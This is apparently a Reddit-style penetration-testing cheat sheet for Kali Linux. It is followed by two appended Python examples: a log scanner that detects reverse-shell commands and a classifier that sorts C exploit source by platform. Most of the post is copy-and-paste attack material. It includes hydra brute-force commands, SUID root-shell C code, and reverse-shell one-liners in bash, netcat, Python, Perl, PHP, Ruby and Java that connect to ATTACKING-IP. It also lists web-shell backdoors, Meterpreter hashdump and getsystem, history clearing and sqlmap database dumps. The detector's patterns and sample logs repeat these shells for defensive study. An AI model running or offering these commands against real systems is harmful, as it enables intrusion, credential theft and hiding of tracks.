python -m SimpleHTTPServer 80 - Run a basic http server, great for serving up shells etc

Mounting File Shares

mount 192.168.1.1:/vol/share /mnt/nfs - Mount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs - Mount Windows CIFS / SMB share on Linux at /mnt/cifs; if you remove password it will prompt on the CLI (more secure as it won't end up in bash_history)
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no - Mount a Windows share on Windows from the command line
apt-get install smb4k -y - Install smb4k on Kali, useful Linux GUI for browsing SMB shares

Basic Finger Printing

nc -v 192.168.1.1 25 or telnet 192.168.1.1 25 - Basic versioning / finger printing via displayed banner

SNMP Enumeration

snmpcheck -t 192.168.1.X -c public
snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName | cut -d* * -f
snmpenum -t 192.168.1.X
onesixtyone -c names -i hosts

DNS Zone Transfers

nslookup -> set type=any -> ls -d blah.com - Windows DNS zone transfer
dig axfr blah.com @ns1.blah.com - Linux DNS zone transfer

DNSRecon

dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml

HTTP / HTTPS Webserver Enumeration

nikto -h 192.168.1.1 - Perform a nikto scan against target
dirbuster - Configure via GUI, CLI input doesn't work most of the time

Packet Inspection

tcpdump tcp port 80 -w output.pcap -i eth0 - tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX - Enumerate users from SMB
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt - RID cycle SMB / enumerate users from SMB

SNMP User Enumeration

snmpwalk -c public -v1 192.168.X.XXX 1 | grep 77.1.2.25 | cut -d" " -f4 - Enumerate users from SNMP
python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX - Enumerate users from SNMP
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt (then grep) - Search for SNMP servers with nmap, grepable output

Passwords

/usr/share/wordlists - Kali word lists

Brute Forcing Services

Hydra FTP Brute Force

hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX ftp -V - Hydra FTP brute force

Hydra POP3 Brute Force

hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX pop3 -V - Hydra POP3 brute force

Hydra SMTP Brute Force

hydra -P /usr/share/wordlists/nmap.lst 192.168.X.XXX smtp -V - Hydra SMTP brute force

Password Cracking

John The Ripper - JTR
john --wordlist=/usr/share/wordlists/rockyou.txt hashes - JTR password cracking
john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt - JTR forced descrypt cracking with wordlist
john --format=descrypt hash --show - JTR forced descrypt brute force cracking

Exploit Research

searchsploit windows 2003 | grep -i local - Search exploit-db for exploit, in this example windows 2003 + local esc
site:exploit-db.com exploit kernel <= 3 - Use google to search exploit-db.com for exploits
grep -R "W7" /usr/share/metasploit-framework/modules/exploits/windows/* - Search metasploit modules using grep - msf search sucks a bit

Linux Penetration Testing Commands

Linux Network Commands

netstat -tulpn - Show Linux network ports with process IDs (PIDs)
watch ss -stplu - Watch TCP, UDP open ports in real time with socket summary.
lsof -i - Show established connections.
macchanger -m MACADDR INTR - Change MAC address on KALI Linux.
ifconfig eth0 192.168.2.1/24 - Set IP address in Linux.
ifconfig eth0:1 192.168.2.3/24 - Add IP address to existing network interface in Linux.
ifconfig eth0 hw ether MACADDR - Change MAC address in Linux using ifconfig.
ifconfig eth0 mtu 1500 - Change MTU size Linux using ifconfig, change 1500 to your desired MTU.
dig -x 192.168.1.1 - Dig reverse lookup on an IP address.
host 192.168.1.1 - Reverse lookup on an IP address, in case dig is not installed.
dig @192.168.2.2 domain.com -t AXFR - Perform a DNS zone transfer using dig.
host -l domain.com nameserver - Perform a DNS zone transfer using host.
nbtstat -A x.x.x.x - Get hostname for IP address.
ip addr add 192.168.2.22/24 dev eth0 - Adds a hidden IP address to Linux, does not show up when performing an ifconfig.
tcpkill -9 host google.com - Blocks access to google.com from the host machine.
echo "1" > /proc/sys/net/ipv4/ip_forward - Enables IP forwarding, turns Linux box into a router - handy for routing traffic through a box.
echo "8.8.8.8" > /etc/resolv.conf - Use Google DNS.

System Information Commands

Useful for local enumeration.

whoami - Shows currently logged in user on Linux.
id - Shows currently logged in user and groups for the user.
last - Shows last logged in users.
mount - Show mounted drives.
df -h - Shows disk usage in human readable output.
echo "user:passwd" | chpasswd - Reset password in one line.
getent passwd - List users on Linux.
strings /usr/local/bin/blah - Shows contents of non-text files, e.g. what's in a binary.
uname -ar - Shows running kernel version.
PATH=$PATH:/my/new-path - Add a new PATH, handy for local FS manipulation.
history - Show bash history, commands the user has entered previously.

Redhat / CentOS / RPM Based Distros

cat /etc/redhat-release - Shows Redhat / CentOS version number.
rpm -qa - List all installed RPM's on an RPM based Linux distro.
rpm -q --changelog openvpn - Check installed RPM is patched against CVE, grep the output for CVE.

YUM Commands

Package manager used by RPM based systems, you can pull some useful information about installed packages and / or install additional tools.

yum update - Update all RPM packages with YUM, also shows whats out of date.
yum update httpd - Update individual packages, in this example HTTPD (Apache).
yum install package - Install a package using YUM.
yum --exclude=package kernel* update - Exclude a package from being updated with YUM.
yum remove package - Remove package with YUM.
yum erase package - Remove package with YUM.
yum list package - Lists info about yum package.
yum provides httpd - What a package does, e.g. Apache HTTPD Server.
yum info httpd - Shows package info, architecture, version etc.
yum localinstall blah.rpm - Use YUM to install local RPM, settles deps from repo.
yum deplist package - Shows deps for a package.
yum list installed | more - List all installed packages.
yum grouplist | more - Show all YUM groups.
yum groupinstall 'Development Tools' - Install YUM group.

Debian / Ubuntu / .deb Based Distros

cat /etc/debian_version - Shows Debian version number.
cat /etc/*-release - Shows Ubuntu version number.
dpkg -l - List all installed packages on Debian / .deb based Linux distro.

Linux User Management

useradd new-user - Creates a new Linux user.
passwd username - Reset Linux user password, enter just passwd if you are root.
deluser username - Remove a Linux user.

Linux Decompression Commands

How to extract various archives (tar, zip, gzip, bzip2 etc) on Linux and some other tricks for searching inside of archives etc.

unzip archive.zip - Extracts zip file on Linux.
zipgrep *.txt archive.zip - Search inside a .zip archive.
tar xf archive.tar - Extract tar file Linux.
tar xvzf archive.tar.gz - Extract a tar.gz file Linux.
tar xjf archive.tar.bz2 - Extract a tar.bz2 file Linux.
tar ztvf file.tar.gz | grep blah - Search inside a tar.gz file.
gzip -d archive.gz - Extract a gzip file Linux.
zcat archive.gz - Read a gz file Linux without decompressing.
zless archive.gz - Same function as the less command for .gz archives.
zgrep 'blah' /var/log/maillog*.gz - Search inside .gz archives on Linux, search inside of compressed log files.
vim file.txt.gz - Use vim to read .txt.gz files (my personal favorite).
upx -9 -o output.exe input.exe - UPX compress .exe file Linux.

Linux Compression Commands

zip -r file.zip /dir/* - Creates a .zip file on Linux.
tar cf archive.tar files - Creates a tar file on Linux.
tar czf archive.tar.gz files - Creates a tar.gz file on Linux.
tar cjf archive.tar.bz2 files - Creates a tar.bz2 file on Linux.
gzip file - Creates a file.gz file on Linux.

Linux File Commands

df -h blah - Display size of file / dir Linux.
diff file1 file2 - Compare / Show differences between two files on Linux.
md5sum file - Generate MD5SUM Linux.
md5sum -c blah.iso.md5 - Check file against MD5SUM on Linux, assuming both file and .md5 are in the same dir.
file blah - Find out the type of file on Linux, also displays if file is 32 or 64 bit.
dos2unix - Convert Windows line endings to Unix / Linux.
base64 < input-file > output-file - Base64 encodes input file and outputs a Base64 encoded file called output-file.
base64 -d < input-file > output-file - Base64 decodes input file and outputs a Base64 decoded file called output-file.
touch -r ref-file new-file - Creates a new file using the timestamp data from the reference file, drop the -r to simply create a file.
rm -rf - Remove files and directories without prompting for confirmation.

Samba Commands

Connect to a Samba share from Linux.

smbmount //server/share /mnt/win -o user=username,password=password1
smbclient -U user //server/share
mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share

Breaking Out of Limited Shells

Credit to G0tmi1k for these (or wherever he stole them from!).

The Python trick:

python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i

Misc Commands

init 6 - Reboot Linux from the command line.
gcc -o output input.c - Compile C code.
gcc -m32 -o output input.c - Cross compile C code, compile 32 bit binary on 64 bit Linux.
unset HISTFILE - Disable bash history logging.
rdesktop X.X.X.X - Connect to RDP server from Linux.
kill -9 $$ - Kill current session.
chown user:group blah - Change owner of file or dir.
chown -R user:group blah - Change owner of file or dir and all underlying files / dirs - recursive chown.
chmod 600 file - Change file / dir permissions, see Linux File System Permissions for details.
Clear bash history - $ ssh [email protected] | cat /dev/null > ~/.bash_history

Linux File System Permissions

777 rwxrwxrwx No restriction, global WRX any user can do anything.
755 rwxr-xr-x Owner has full access, others can read and execute the file.
700 rwx------ Owner has full access, no one else has access.
666 rw-rw-rw- All users can read and write but not execute.
644 rw-r--r-- Owner can read and write, everyone else can read.
600 rw------- Owner can read and write, everyone else has no access.

Linux File System

/ - also known as "slash" or the root.
/bin - Common programs, shared by the system, the system administrator and the users.
/boot - Boot files, boot loader (grub), kernels, vmlinuz
/dev - Contains references to system devices, files with special properties.
/etc - Important system config files.
/home - Home directories for system users.
/lib - Library files, includes files for all kinds of programs needed by the system and the users.
/lost+found - Files that were saved during failures are here.
/mnt - Standard mount point for external file systems.
/media - Mount point for external file systems (on some distros).
/net - Standard mount point for entire remote file systems - nfs.
/opt - Typically contains extra and third party software.
/proc - A virtual file system containing information about system resources.
/root - root user's home dir.
/sbin - Programs for use by the system and the system administrator.
/tmp - Temporary space for use by the system, cleaned upon reboot.
/usr - Programs, libraries, documentation etc. for all user-related programs.
/var - Storage for all variable files and temporary files created by users, such as log files, mail queue, print spooler. Web servers, Databases etc.

Linux Interesting Files / Dir’s

Places that are worth a look if you are attempting to privilege escalate / perform post exploitation.

Directory Description

/etc/passwd - Contains local Linux users.
/etc/shadow - Contains local account password hashes.
/etc/group - Contains local account groups.
/etc/init.d/ - Contains service init scripts - worth a look to see what's installed.
/etc/hostname - System hostname.
/etc/network/interfaces - Network interfaces.
/etc/resolv.conf - System DNS servers.
/etc/profile - System environment variables.
~/.ssh/ - SSH keys.
~/.bash_history - User's bash history log.
/var/log/ - Linux system log files are typically stored here.
/var/adm/ - UNIX system log files are typically stored here.
/var/log/apache2/access.log & /var/log/httpd/access.log - Apache access log file typical path.
/etc/fstab - File system mounts.

Compiling Exploits

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.
process.h, string.h, winbase.h, windows.h, winsock2.h - Windows exploit code
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/socket.h, sys/types.h, unistd.h - Linux exploit code

Build Exploit GCC

gcc -o exploit exploit.c - Basic GCC compile

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

gcc -m32 exploit.c -o exploit - Cross compile 32 bit binary on 64 bit Linux

Compile Windows .exe on Linux

i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe - Compile windows .exe on Linux

SUID Binary

Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.

Below are some quick copy and paste examples for various shells:

SUID C Shell for /bin/bash

int main(void){ setresuid(0, 0, 0); system("/bin/bash"); }

SUID C Shell for /bin/sh

int main(void){ setresuid(0, 0, 0); system("/bin/sh"); }

Building the SUID Shell binary

gcc -o suid suid.c
gcc -m32 -o suid suid.c - for 32bit

Setup Listening Netcat

Your remote shell will need a listening netcat instance in order to connect back.

Set your Netcat listening shell on an allowed port

Use a port that is likely allowed via outbound firewall rules on the target network, e.g. 80 / 443

To setup a listening netcat instance, enter the following:

[email protected]:~# nc -nvlp 80
nc: listening on :: 80 ...
nc: listening on 0.0.0.0 80 ...

NAT requires a port forward

If your attacking machine is behind a NAT router, you'll need to setup a port forward to the attacking machine's IP / Port.

ATTACKING-IP is the machine running your listening netcat session, port 80 is used in all examples below (for reasons mentioned above).

Bash Reverse Shells

exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done

or:

while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

PHP Reverse Shell

php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");' (Assumes TCP uses file descriptor 3. If it doesn't work, try 4, 5, or 6)

Netcat Reverse Shell

nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

Telnet Reverse Shell

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Remember to listen on 443 on the attacking machine also.

Perl Reverse Shell

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Windows Reverse Shell

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby Reverse Shell

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java Reverse Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Gawk Reverse Shell

#!/usr/bin/gawk -f

BEGIN {
    Port   = 8080
    Prompt = "bkd> "

    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}

Kali Web Shells

The following shells exist within Kali Linux, under /usr/share/webshells/; these are only useful if you are able to upload, inject or transfer the shell to the machine.

Kali PHP Web Shells

/usr/share/webshells/php/php-reverse-shell.php - Pen Test Monkey - PHP Reverse Shell
/usr/share/webshells/php/php-findsock-shell.php
/usr/share/webshells/php/findsock.c - Pen Test Monkey, Findsock Shell. Build with gcc -o findsock findsock.c (be mindful of the target server's architecture), execute with netcat not a browser: nc -v target 80
/usr/share/webshells/php/simple-backdoor.php - PHP backdoor, useful for CMD execution if upload / code injection is possible, usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
/usr/share/webshells/php/php-backdoor.php - Larger PHP shell, with a text input box for command execution.

Tip: Executing Reverse Shells

The last two shells above are not reverse shells, however they can be useful for executing a reverse shell.

Kali Perl Reverse Shell

/usr/share/webshells/perl/perl-reverse-shell.pl - Pen Test Monkey - Perl Reverse Shell
/usr/share/webshells/perl/perlcmd.cgi - Pen Test Monkey, Perl Shell. Usage: http://target.com/perlcmd.cgi?cat /etc/passwd

Kali Cold Fusion Shell

/usr/share/webshells/cfm/cfexec.cfm - Cold Fusion Shell - aka CFM Shell

Kali ASP Shell

/usr/share/webshells/asp/ - Kali ASP Shells

Kali ASPX Shells

/usr/share/webshells/aspx/ - Kali ASPX Shells

Kali JSP Reverse Shell

/usr/share/webshells/jsp/jsp-reverse.jsp - Kali JSP Reverse Shell

TTY Shells

Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.

Python TTY Shell Trick - python -c 'import pty;pty.spawn("/bin/bash")' - echo os.system('/bin/bash')
Spawn Interactive sh shell - /bin/sh -i
Spawn Perl TTY Shell - exec "/bin/sh"; perl -e 'exec "/bin/sh";'
Spawn Ruby TTY Shell - exec "/bin/sh"
Spawn Lua TTY Shell - os.execute('/bin/sh')

Spawn TTY Shell from Vi

Run shell commands from vi - :!bash
Spawn TTY Shell NMAP - !sh

SSH Port Forwarding

ssh -L 9999:10.0.2.2:445 [email protected] - Port 9999 locally is forwarded to port 445 on 10.0.2.2 through host 192.168.2.250

SSH Port Forwarding with Proxychains

ssh -D 127.0.0.1:9050 [email protected] - Dynamically allows all port forwards to the subnets available on the target.

Meterpreter Payloads

Windows reverse meterpreter payload

set payload windows/meterpreter/reverse_tcp - Windows reverse tcp payload

Windows VNC Meterpreter payload

set payload windows/vncinject/reverse_tcp set ViewOnly false - Meterpreter Windows VNC Payload

Linux Reverse Meterpreter payload

set payload linux/meterpreter/reverse_tcp - Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

upload file c:\windows - Meterpreter upload file to Windows target
download c:\windows\repair\sam /tmp - Meterpreter download file from Windows target
execute -f c:\windows\temp\exploit.exe - Meterpreter run .exe on target - handy for executing uploaded exploits
execute -f cmd -c - Creates new channel with cmd shell
ps - Meterpreter show processes
shell - Meterpreter get shell on the target
getsystem - Meterpreter attempts privilege escalation on the target
hashdump - Meterpreter attempts to dump the hashes on the target
portfwd add -l 3389 -p 3389 -r target - Meterpreter create port forward to target machine
portfwd delete -l 3389 -p 3389 -r target - Meterpreter delete port forward

Common Metasploit Modules

Top metasploit modules.

Remote Windows Metasploit Modules (exploits)

use exploit/windows/smb/ms08_067_netapi - MS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapi - MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index - MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows Metasploit Modules (exploits)

use exploit/windows/local/bypassuac - Bypass UAC on Windows 7 + Set target + arch, x86/64

Auxiliary Metasploit Modules

use auxiliary/scanner/http/dir_scanner - Metasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscan - Metasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_login - Metasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_version - Metasploit MSSQL Version Scanner
use auxiliary/scanner/oracle/oracle_login - Metasploit Oracle Login Module

Metasploit Powershell Modules

use exploit/multi/script/web_delivery - Metasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershell - Metasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployer - Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload - Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

run post/windows/gather/win_privs - Metasploit show privileges of current user
use post/windows/gather/credentials/gpp - Metasploit grab GPP saved passwords
load mimikatz -> wdigest - Metasploit load Mimikatz
run post/windows/gather/local_admin_search_enum - Identify other machines that the supplied domain user has administrative access to

CISCO IOS Commands

A collection of useful Cisco IOS commands.

enable - Enters enable mode
conf t - Short for, configure terminal
(config)# interface fa0/0 - Configure FastEthernet 0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255 - Add ip to fa0/0
(config-if)# line vty 0 4 - Configure vty line
(config-line)# login - Cisco set telnet password
(config-line)# password YOUR-PASSWORD - Set telnet password

show running-config - Show running config loaded in memory

show startup-config - Show startup config

show version - show cisco IOS version

show session - display open sessions

show ip interface - Show network interfaces

show interface e0 - Show detailed interface info

show ip route - Show routes

show access-lists - Show access lists

dir file systems - Show available files

dir all-filesystems - File information

dir /all - Show deleted files

terminal length 0 - No limit on terminal output

copy running-config tftp - Copies running config to tftp server

copy running-config startup-config - Copy startup-config to running-config

Cryptography

Hash Lengths

MD5 Hash Length - 16 Bytes
SHA-1 Hash Length - 20 Bytes
SHA-256 Hash Length - 32 Bytes
SHA-512 Hash Length - 64 Bytes

SQLMap Examples

sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3 - Automated sqlmap scan
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php" - Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump - Scan url for union + error based injection with mysql backend and use a random user agent + database dump
sqlmap -o -u "http://meh.com/form/" --forms - sqlmap check form for injection
sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users --dump - sqlmap dump and crack hashes for table users on database-name
submitted by LubuntuFU to Kalilinux
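The reverse-shell one-liners and TTY-upgrade tricks in the post above are also what a defender wants to spot in command-execution logs. The following is an added example, not code from the post or its sources: it rejoins auditd EXECVE argv fields and matches them against the structural traits of those one-liners. The log lines and the 203.0.113.x / 192.0.2.x addresses are constructed for the example.

```python
"""Added example, not part of the original post: flag the reverse-shell and
TTY-upgrade one-liners from the cheat sheet when they appear in
command-execution logs such as auditd EXECVE records.  All log lines here
are constructed for the example; the 203.0.113.x and 192.0.2.x addresses
are documentation ranges, not real hosts."""
import re
from typing import List, NamedTuple, Tuple


class Indicator(NamedTuple):
    name: str
    pattern: "re.Pattern[str]"


# Each pattern keys on a structural trait of the one-liners on the page
# (the /dev/tcp redirect, nc -e, socket + dup2, pty.spawn ...) rather than
# on an exact string, so cosmetic rewrites still match.
INDICATORS = [
    Indicator("bash-dev-tcp", re.compile(r"/dev/(tcp|udp)/[^/\s]+/\d+")),
    Indicator("netcat-exec", re.compile(r"\bnc(at)?\b[^|;&]*\s-e\s+/bin/(ba)?sh\b")),
    Indicator("fifo-shell", re.compile(r"\b(mknod\s+\S+\s+p|mkfifo\s+\S+)\b.*\b(nc|ncat|telnet)\b")),
    Indicator("python-dup2-shell", re.compile(r"socket\.socket\(.*os\.dup2\(.*subprocess")),
    Indicator("perl-socket-shell", re.compile(r"use Socket;.*connect\(.*exec\(")),
    Indicator("php-fsockopen-shell", re.compile(r"fsockopen\(.*exec\(")),
    Indicator("ruby-socket-shell", re.compile(r"TCPSocket\.open\(.*\bexec\b")),
    Indicator("tty-upgrade", re.compile(r"pty\.spawn\(|os\.system\(['\"]/bin/(ba)?sh")),
]

# auditd splits argv into a0="..." a1="..." fields; rejoin them so the
# patterns see the command line the way the shell did.
AUDIT_ARG = re.compile(r'\ba\d+="([^"]*)"')


def normalize(line: str) -> str:
    """Command line to match: rejoined argv for EXECVE records, the raw
    line for anything else (syslog, shell history exports)."""
    args = AUDIT_ARG.findall(line)
    return " ".join(args) if args else line


def scan_line(line: str) -> List[str]:
    """Names of every indicator that matches this one log line."""
    cmd = normalize(line)
    return [ind.name for ind in INDICATORS if ind.pattern.search(cmd)]


def scan_log(lines: List[str]) -> List[Tuple[int, str, List[str]]]:
    """(line number, normalized command, indicator names) for each hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        names = scan_line(line)
        if names:
            hits.append((n, normalize(line), names))
    return hits


# Constructed sample: four of the page's one-liners mixed with benign admin
# activity (an SSH port forward, a local HTTP server, an sshd syslog line).
SAMPLE_LOG = [
    'type=EXECVE msg=audit(1700000000.001:10): argc=4 a0="ssh" a1="-L" a2="9999:10.0.2.2:445" a3="user@192.0.2.10"',
    'type=EXECVE msg=audit(1700000000.002:11): argc=3 a0="bash" a1="-c" a2="bash -i >& /dev/tcp/203.0.113.5/80 0>&1"',
    'type=EXECVE msg=audit(1700000000.003:12): argc=3 a0="python3" a1="-m" a2="http.server"',
    'type=EXECVE msg=audit(1700000000.004:13): argc=3 a0="python" a1="-c" a2="import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'203.0.113.5\',80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\'/bin/sh\',\'-i\'])"',
    'type=EXECVE msg=audit(1700000000.005:14): argc=5 a0="nc" a1="-e" a2="/bin/sh" a3="203.0.113.5" a4="80"',
    'type=EXECVE msg=audit(1700000000.006:15): argc=3 a0="python" a1="-c" a2="import pty;pty.spawn(\'/bin/bash\')"',
    "Jan  1 10:00:00 host sshd[1234]: Accepted publickey for user from 192.0.2.20 port 51000 ssh2",
]

if __name__ == "__main__":
    for n, cmd, names in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(names)}: {cmd}")
```

Real auditd hex-encodes arguments containing quotes or control characters, so a production version should decode those fields before matching.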

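The "Identifying if C code is for Windows or Linux" section of the post relies on reading the #include lines by eye. As an added example (not from the post or its sources), here is that triage as a small classifier over the header lists the post gives; it treats string.h as neutral because it is standard C on both platforms (an assumption of this example), and the three source snippets are constructed.

```python
"""Added example, not part of the original post: decide from its #include
lines whether a piece of C source is meant to build on Windows or Linux,
using the header lists given in the cheat sheet.  The three source
snippets at the bottom are constructed for the example."""
import re
from typing import Dict, List

# Header sets from the page.  string.h is listed under Windows there, but it
# is standard C and appears in both worlds, so it is left out of the
# decision here (assumption made for this example).
WINDOWS_HEADERS = {"process.h", "winbase.h", "windows.h", "winsock2.h"}
LINUX_HEADERS = {"arpa/inet.h", "fcntl.h", "netdb.h", "netinet/in.h",
                 "sys/socket.h", "sys/types.h", "unistd.h"}

INCLUDE = re.compile(r'^[ \t]*#[ \t]*include[ \t]*[<"]([^>"]+)[>"]', re.MULTILINE)
COMMENT = re.compile(r"/\*.*?\*/|//[^\n]*", re.DOTALL)
WIN_GUARD = re.compile(r"#\s*if(n)?def\s+(_WIN32|WIN32|_MSC_VER)\b")


def includes(source: str) -> List[str]:
    """Included header names, with comments stripped first so that a
    commented-out #include does not count, normalized to lower case and
    forward slashes."""
    code = COMMENT.sub("", source)
    return [h.strip().lower().replace("\\", "/") for h in INCLUDE.findall(code)]


def classify(source: str) -> Dict[str, object]:
    """Return the verdict plus the evidence behind it."""
    hdrs = includes(source)
    win = sorted({h for h in hdrs if h in WINDOWS_HEADERS})
    lin = sorted({h for h in hdrs if h in LINUX_HEADERS})
    guarded = bool(WIN_GUARD.search(source))
    if win and lin:
        # Both families present: usually portable code behind #ifdef _WIN32.
        verdict = "portable" if guarded else "mixed"
    elif win:
        verdict = "windows"
    elif lin:
        verdict = "linux"
    else:
        verdict = "unknown"
    return {
        "verdict": verdict,
        "windows": win,
        "linux": lin,
        "other": sorted({h for h in hdrs if h not in WINDOWS_HEADERS | LINUX_HEADERS}),
    }


# Constructed snippets (only the include blocks matter for the classifier).
WINDOWS_SRC = """\
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
int main(void) { return 0; }
"""
LINUX_SRC = """\
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
// #include <windows.h>   commented out, must be ignored
int main(void) { return 0; }
"""
PORTABLE_SRC = """\
#ifdef _WIN32
#  include <winsock2.h>
#else
#  include <sys/socket.h>
#  include <unistd.h>
#endif
int main(void) { return 0; }
"""

if __name__ == "__main__":
    for name, src in (("windows", WINDOWS_SRC), ("linux", LINUX_SRC), ("portable", PORTABLE_SRC)):
        print(name, classify(src))
```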